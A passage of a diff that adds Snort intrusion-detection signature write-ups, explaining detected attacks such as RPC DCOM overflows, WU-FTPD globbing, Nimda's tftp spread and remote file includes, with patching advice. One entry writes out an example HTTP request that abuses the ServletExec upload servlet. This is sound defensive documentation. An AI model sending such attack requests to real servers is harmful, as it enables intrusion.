+Simple. Many exploits exist for various systems and software.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Care should be taken to investigate the source of the event. Check for
+signs of system compromise in log files. Check for listening services on
+high ports.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+OpenNap Specification
+http://opennap.sourceforge.net/napster.txt
+
+--
--- /dev/null
+++ b/doc/signatures/1239.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1239
+
+--
+Summary:
+This event is generated when an attempt is made to execute the RFParalyze DoS
+exploit.
+
+--
+Impact:
+If the destination machine is vulnerable, it may start behaving
+unpredictably.  Succesful exploitation may lead to a full system crash 
+or may cause certain services to become unavailable.
+
+--
+Detailed Information:
+This signature triggers on execution of RFParalyze, an exploit written 
+in 2000 by Rain Forest Puppy.  It was based on a binary exploit called 
+"whisper", which was used in the wild at that time.  This exploit 
+performs a NetBIOS session request with a source host of NULL, which is 
+incorrectly handled by Windows 95/98 hosts.
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+
+--
+Attack Scenarios:
+An attacker can crash critical machines, thereby
+preventing them from being accessed by legitimate clients.
+
+--
+Ease of Attack:
+Simple.  Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+Potential future versions of this exploit, which may use
+different message strings, will not be detected by this rule.
+
+--
+Corrective Action: 
+Patches are not available from the vendor.
+
+Use a packet filtering firewall to block inbound traffic to port 139/TCP from
+all untrusted networks & hosts
+
+Upgrade critical machines to a more recent and supported version of the
+operating system.
+
+--
+Contributors:
+Snort documentation contributed by Maarten Van Horenbeeck (maarten@daemon.be)
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/529.txt
@@ -0,0 +1,68 @@
+Rule:  
+
+--
+Sid:
+529
+
+--
+Summary:
+This event is generated when an attempt is made to issue a Denial of
+Service (DoS) attack against a host using the RFPoison tool.
+
+--
+Impact:
+Serious. Denial of Service.
+
+--
+Detailed Information:
+The Microsoft Local Security Authority (LSA) service does not handle
+certain malformed requests correctly. This service allows for the
+manipulation of user privileges on the host. A specially crafted
+malformed request sent to the LSA service will cause the system to
+become unresponsive.
+
+--
+Affected Systems:
+	Microsoft Windows NT Workstation
+	Microsoft Windows NT Server
+	Microsoft Windows NT Terminal Server
+	
+--
+Attack Scenarios:
+An attacker can use the RFPoison tool against a host to generate the
+request necessary to cause the DoS.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+RFP:
+http://www.wiretrip.net/rfp/txt/rfp9906.txt
+
+Microsoft:
+http://support.microsoft.com/support/kb/articles/Q231/4/57.asp
+
+--
--- /dev/null
+++ b/doc/signatures/443.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+
+Sid:
+443
+
+--
+
+Summary:
+This event is generated when an ICMP Router Selection message is found on the network.
+
+--
+
+Impact:
+
+--
+
+Detailed Information:
+ICMP Address Mask Requests are defined in RFC 950 as the third method hosts may support for determing the address mask correspoding to its IP address.  In most implementations this method is not supported, and should not be normal traffic on most networks.  
+
+--
+
+Attack Scenarios:
+Attackers may use this ICMP Type to gather information about the subnet masks of a given network.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate ICMP Address Mask Requests.
+--
+
+False Positives:
+Legitimate uses of ICMP Address Mask Requests exist.  Some hosts my implement this method as the final fall back option after static configuration and dynamic address mask configuration has failed.
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 17 should be blocked at the upstream firewall.  This type of ICMP request should never originate from a host outside of the protected network.
+--
+
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/3157.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3157
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1041.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1041
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2787.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2787
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure instantiate_online
+. This procedure is included in
+dbms_repcat_instantiate.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1377.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1377
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a file
+globbing vulnerability associated with WU-FTPD.
+
+--
+Impact:
+Serious. Remote root access. A successful attack can allow remote
+execution of commands with privileges of WU-FTPD, most often root.
+
+--
+Detailed Information:
+An exploit in Washington University FTP daemon (WU-FTPD) code associated
+with file globbing can allow execution of arbitrary code with the
+privileges of WU-FTPD, typically root. WU-FTPD invokes the glob function
+when certain characters are used in a file name argument supplied by an
+FTP client. The glob function fails to properly handle illegal strings
+such as "~{" and "~[". The problem is compounded when the glob function
+returns an error condition that is incorrectly handled, which may lead
+to the corruption of process memory space. This exploit requires login
+access to a vulnerable server either via an anonymous or established
+user account.
+
+--
+Affected Systems:
+	WU-FTPD 2.6.1, 2.6.0, and 2.5.0.
+
+--
+Attack Scenarios:
+An attacker may login to a vulnerable WU-FTP server and enter a
+malformed file argument to gain access and execute arbitrary commands.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+Apply the appropriate vendor supplied patch.
+
+Do not enable anonymous FTP access unless required.  
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.kb.cert.org/vuls/id/886083
+
+--
--- /dev/null
+++ b/doc/signatures/3246.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3246
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1080.txt
@@ -0,0 +1,67 @@
+Rule:  
+--
+Sid:
+1080
+
+--
+
+Summary:
+This event is generated when an attempt is made to access the Unify eWave 
+ServletExec uploader servlet, which may lead to a web server compromise.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Unify eWave ServletExec is a webserver-based JSP and Java Servlet
+environment available for many popular web servers (e.g., Apache, Netscape
+web server, and IIS).  Versions of ServletExec before 3.0E contain a
+vulnerability in UploadServlet that could allow an attacker to upload
+arbitrary files, including executables used to compromise the web server.
+
+--
+Affected Systems:
+Unify eWave ServletExec versions before 3.0E. 
+
+--
+Attack Scenarios:
+Attacker sends a simple HTTP GET or POST like the following:
+GET http://target/servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0
+
+The attacker could upload any arbitrary file onto the web server, including
+executable code that can then be used to compromise the web server.
+
+--
+Ease of Attack:
+Relatively simple handcrafted HTTP GET or POST.
+
+--
+False Positives:
+It is possible that legitimate web administrators could use UploadServlet.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Examine the packet to see if a web request was being done.  Try to
+determine if the request was by a legitimate web admin or not.
+Determine from the web server's configuration whether it was a threat or not
+(e.g., whether the web server even runs ServletExec, and if so whether
+it was running a vulnerable version).
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2079.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2079
+
+--
+Summary:
+number for the rpc service lockd.
+
+--
+Impact:
+Intelligence gathering
+
+--
+Detailed Information:
+This may be an attacker probing for vulnerable versions of rpc services.
+In this case, the rpc service lockd.
+
+If a user connects to port 1024 being used by the rpc service lockd, a 
+denial of service can be issued by supplying random input to the 
+service. This is an attempt to ascertain whether or not that attack 
+could be successful.
+
+--
+Affected Systems:
+	Debian Linux 2.1, 2.2 pre potato and 2.2
+	MandrakeSoft Linux Mandrake 6.0, 6.1 and 7.0
+	RedHat Linux 6.0 sparc, i386 and alpha
+	RedHat Linux 6.1 sparc, i386 and alpha
+	RedHat Linux 6.2 sparc, i386 and alpha
+
+--
+Attack Scenarios:
+The attacker needs to send random data to port 1024 used by nlockmgr.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate patches for the system.
+
+Upgrade the software to the latest non vulnerable version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1372
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0508
+
+--
--- /dev/null
+++ b/doc/signatures/401.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+401
+
+--
+
+Summary:
+This event is generated when An ICMP Network Unreachable datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when the route to the destination network is not available. This could be an indication of routing problems on the network.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2723.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2723
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_char
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2750.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2750
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_mview_repsites
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2775.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2775
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_nvarchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1289.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1289
+
+--
+Summary:
+This event is generated when an exploited Internet Information Server (IIS) host attempts to perform a tftp download of the file admin.dll to infect the host with the nimda worm. 
+
+--
+Impact:
+Administrator access.  A successful attack can allow remote execution of commands with administrator privleges.
+
+--
+Detailed Information:
+The nimda worm uses multiple propagation methods.  One method exploits a victim Internet Information Server (IIS) using a unicode directory traversal attack to execute commands on the target server.  An attempt is made to execute a tftp download of the file admin.dll from the infected attacking host to the victim server.  The admin.dll file is a copy of the nimda worm that is activated on the newly infected victim server.  This event is triggered if the IIS server is exploitable and the tftp transfer is attempted.
+
+--
+Affected Systems:
+Hosts running Microsoft IIS 4.0 and 5.0.
+
+--
+Attack Scenarios:
+The worm will attempt to remotely exploit a unicode directory vulnerability to infect an IIS server by executing a tftp download of the nimda worm.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch referenced in Microsoft Security Bulletin MS00-078.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2001-26.html
+
+Microsoft:
+http://www.microsoft.com/technet/Security/Bulletin/ms00-078.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2657.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+2657
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with Netscape Network Security Services (NSS) message parsing.
+
+--
+Impact:
+A successful attack can cause a heap overflow and the subsequent execution
+of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way NSS parses a client connect SSLv2 message
+that can cause a heap overflow and the subsequent execution of arbitrary code
+on a vulnerable server.  This can occur when an overly long challenge length
+and accompanying data are supplied in a Client Hello message.
+
+--
+Affected Systems:
+Netscape Enterprise Webserver all versions
+Netscape Personalization Engine all versions
+Nescape Directory Server all versions
+Netscape Certificate Management Server all versions
+Sun One/iPlanet all versions
+
+--
+Attack Scenarios:
+An attacker can send a Client Hello message with an overly long challenge
+length and data, causing a heap overflow on a vulnerable server.
+
+--
+Ease of Attack:
+Difficult.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/397.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+397
+
+--
+
+Summary:
+This event is generated when An ICMP Host Precedence Violation is sent by the first hop router to a host to indicate that a requested precedence is not permitted for the particular combination of source and destination host, network destination, upper layer protocol, or source/destination port.
+
+--
+
+Impact:
+Routers will generate this message when the requested precedent is not permitted to transverse the network.  This could be an indication of an improperly configured routing device or a improperly configured host on the network.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/1982.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1982
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000741.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000741
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Geeklog" application running on a webserver. Access to the file "LogView.Admin.class.php" using a remote file being passed as the "$_CONF[path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "$_CONF[path]" parameter in the "LogView.Admin.class.php" script used by the "Geeklog" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Geeklog
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000805.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000805
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BosClassifieds" application running on a webserver. Access to the file "classified.php" using a remote file being passed as the "insPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "insPath" parameter in the "classified.php" script used by the "BosClassifieds" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BosClassifieds
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1444.txt
@@ -0,0 +1,82 @@
+Rule:
+
+--
+
+Sid:
+1444
+
+--
+
+Summary
+This event is generated when a TFTP GET request is made.  This is an 
+indication that someone is attempting to download a file on the server.
+
+--
+
+Impact
+A TFTP GET requests allows a remote attacker to download files on the 
+TFTP server.  If the TFTP server allows anonymous TFTP GET requests it 
+is possible to download any of the published files on the server..
+
+--
+
+Detailed Information
+This rule will generate an event on in-bound TFTP GET requests.  A TFTP 
+GET request is generated when an attempt to download a file from the 
+server is initiated.
+
+--
+
+Attack Scenarios
+Attackers may use TFTP to upload and download files from server that are
+properly or improperly configured.  Normally attackers attempt to locate
+TFTP servers using automated scanners and tools.  Once a TFTP server is 
+located an attempt to write files and get files from the TFTP server is 
+made.  Depending on the results of those tests attackers may attempt to 
+further exploit that system, by overwriting system files or downloading 
+password files to access the system.
+
+Cisco ONS platforms allow unauthenticated access to files via TFTP. This
+event may be generated when an attempt is made to access files on a 
+Cisco device using TFTP.
+
+--
